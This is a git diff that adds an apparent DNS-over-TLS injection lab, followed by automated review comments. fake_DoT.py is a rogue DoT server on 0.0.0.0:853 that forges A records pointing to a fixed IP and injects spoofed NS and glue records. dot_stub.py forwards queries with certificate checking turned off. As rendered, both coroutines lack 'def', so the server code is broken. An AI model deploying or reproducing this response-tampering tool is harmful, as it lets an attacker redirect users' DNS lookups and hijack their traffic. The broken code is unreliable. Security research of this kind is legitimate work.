Diffstat (limited to '11_dot_injection')
-rw-r--r--11_dot_injection/DoT数据注入.pdfbin0 -> 187132 bytes
-rw-r--r--11_dot_injection/dot_stub.py45
-rw-r--r--11_dot_injection/fake_DoT.py63
3 files changed, 108 insertions, 0 deletions
diff --git a/11_dot_injection/DoT数据注入.pdf b/11_dot_injection/DoT数据注入.pdf
new file mode 100644
index 0000000..eec7498
--- /dev/null
+++ b/11_dot_injection/DoT数据注入.pdf
Binary files differ
diff --git a/11_dot_injection/dot_stub.py b/11_dot_injection/dot_stub.py
new file mode 100644
index 0000000..3c35dc7
--- /dev/null
+++ b/11_dot_injection/dot_stub.py
@@ -0,0 +1,45 @@
+import socket
+import ssl
+import dns.message
+import dns.query
+import dns.rcode
+import argparse
+
+parser = argparse.ArgumentParser()
+parser.add_argument('-dot', '--dot', default='dns.alidns.com')
+args = parser.parse_args()
+print(f'DoT server: {args.dot}')
+upstream_server = '47.88.31.213'
+
+# 创建监听socket
+listener = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
+listener.bind(('127.0.0.1', 53))
+
+# 创建TLS连接
+context = ssl.create_default_context()
+context.check_hostname = False
+context.verify_mode = ssl.CERT_NONE
+while True:
+ # 接收DNS请求
+ data, addr = listener.recvfrom(1024)
+ #print(dns.message.from_wire(data))
+ data = dns.message.from_wire(data)
+ if 'baidu' in data.question.__str__():
+ # print(data)
+ # print(addr)
+ print('DNS请求:', data.question)
+ # # 创建TLS连接并发送DNS请求到上游服务器
+ resp = dns.query.tls(
+ q=data,
+ where=upstream_server,
+ timeout=10,
+ ssl_context=context)
+ print('DNS响应:', resp.answer)
+ # with socket.create_connection((upstream_server,853)) as sock:
+ # with context.wrap_socket(sock, server_hostname=upstream_server[0]) as tls_sock:
+ # tls_sock.sendall(data.to_wire())
+ # resp = tls_sock.recv(4096)
+
+ # 将上游服务器的响应发送回客户端
+ listener.sendto(resp.to_wire(), addr)
+ break
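Review bot: The `--dot` value is parsed and printed but never used, because the query goes to the hard-coded `upstream_server` in `where=upstream_server`, so the "DoT server:" line can name a host the script never contacts. Either drop the option or derive the `where=` address from it. The context set up with `check_hostname = False` and `verify_mode = ssl.CERT_NONE` accepts any certificate, which looks like the unauthenticated (opportunistic) DoT client this experiment relies on. If so, say it in a comment such as `# lab only: the DoT server is not authenticated, so any endpoint answering on 853 is trusted`, and note that a real forwarder should keep the default verification. Indentation is lost in this rendering, but if `listener.sendto(resp.to_wire(), addr)` sits outside the `if 'baidu' in ...` branch, `resp` is unbound when the first query does not match.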
diff --git a/11_dot_injection/fake_DoT.py b/11_dot_injection/fake_DoT.py
new file mode 100644
index 0000000..fbf5fea
--- /dev/null
+++ b/11_dot_injection/fake_DoT.py
@@ -0,0 +1,63 @@
+import argparse
+import asyncio
+import ssl
+import socket
+import dns.asyncquery
+import dns.message
+import dns.rcode
+import dns.flags
+import dns.message
+import dns.rrset
+from dnslib import DNSRecord
+
+async handle_client(reader, writer):
+ request_data = await reader.read(1024)
+ request = dns.message.from_wire(request_data[2:])
+ #print(request)
+ dns_request = dns.message.make_query(request.question[0].name, request.question[0].rdtype)
+ dns_request.id = request.id
+ #print(dns_request)
+ dns_response = await dns.asyncquery.udp(q=dns_request, port=53, where='223.5.5.5')
+ #print(dns_response)
+ if str(request.question[0].name) == tamper and int(request.question[0].rdtype) == 1:
+ print('---tamper---', tamper)
+ dns_response.answer = [dns.rrset.from_text(tamper, 3600, dns.rdataclass.IN, dns.rdatatype.A, '39.106.44.126')]
+ if str(request.question[0].name) == inject:
+ print('---inject---', inject)
+ dns_response.additional = [dns.rrset.from_text(inject,3600,dns.rdataclass.IN, dns.rdatatype.NS,'ns.'+inject.split('.',1)[1]),
+ dns.rrset.from_text('ns.'+inject.split('.',1)[1],3600,dns.rdataclass.IN, dns.rdatatype.A,ns)]
+ #print(dns_response)
+
+ response_data = dns_response
+ record_header = len(response_data.to_wire()).to_bytes(2, 'big')
+ # 构建完整的TLS响应数据
+ tls_response_data = record_header + response_data.to_wire()
+ writer.write(tls_response_data)
+ await writer.drain()
+ writer.close()
+
+async start_server():
+ # 配置服务器参数
+ listen_address = '0.0.0.0'
+ listen_port = 853
+ CERT_FILE = "/usr/local/etc/unbound/cert_new4/app.crt" # 替换为你的SSL证书文件路径
+ KEY_FILE = "/usr/local/etc/unbound/cert_new4/app.key" # 替换为你的SSL密钥文件路径
+ context = ssl.create_default_context(ssl.Purpose.CLIENT_AUTH)
+ context.load_cert_chain(certfile=CERT_FILE, keyfile=KEY_FILE)
+ # 创建TCP服务器
+ server = await asyncio.start_server(
+ handle_client, listen_address, listen_port, ssl=context)
+
+ print(f'DoT server listening on {listen_address}:{listen_port}')
+ async with server:
+ await server.serve_forever()
+
+parser = argparse.ArgumentParser()
+parser.add_argument('-tamper', '--tamper', default='')
+parser.add_argument('-inject', '--inject', default='')
+parser.add_argument('-ns', '--ns', default='39.106.44.126')
+args = parser.parse_args()
+tamper = args.tamper +'.'
+inject = args.inject +'.'
+ns = args.ns
+asyncio.run(start_server())
\ No newline at end of file
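Review bot: `start_server` binds `listen_address = '0.0.0.0'`, so this response-rewriting test server is reachable on every interface of the host it runs on. For a lab fixture the default should be loopback or an explicitly chosen lab interface, e.g. `listen_address = '127.0.0.1'` with a command-line override. Omitting `--tamper` or `--inject` does not switch the rewriting off, because the empty defaults become `'.'` after `args.tamper +'.'` and are then compared with the question name. Leaving them unset and guarding with `if args.tamper and ...` would make the default a plain forwarder. As rendered here both coroutines read `async handle_client(...)` and `async start_server()` without `def`, which is a SyntaxError if the file really contains that.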